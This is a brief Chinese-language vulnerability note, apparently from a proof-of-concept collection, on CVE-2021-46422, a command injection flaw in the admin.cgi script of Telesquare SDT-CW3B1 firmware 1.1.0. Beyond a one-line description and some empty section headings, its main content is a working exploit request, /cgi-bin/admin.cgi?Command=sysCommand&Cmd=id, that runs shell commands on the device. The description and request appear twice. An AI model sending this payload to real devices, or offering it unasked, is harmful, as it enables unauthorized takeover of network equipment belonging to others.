Telesquare SDT-CW3B1 admin.cgi 远程命令执行漏洞 CVE-2021-46422
漏洞描述
Telesquare SDT-CW3B1 1.1.0版本中存在命令注入漏洞,攻击者通过漏洞可以获取服务器权限
漏洞影响
网络测绘
漏洞复现
登录页面
验证POC
/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id
Telesquare SDT-CW3B1 1.1.0版本中存在命令注入漏洞,攻击者通过漏洞可以获取服务器权限
登录页面
验证POC
/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id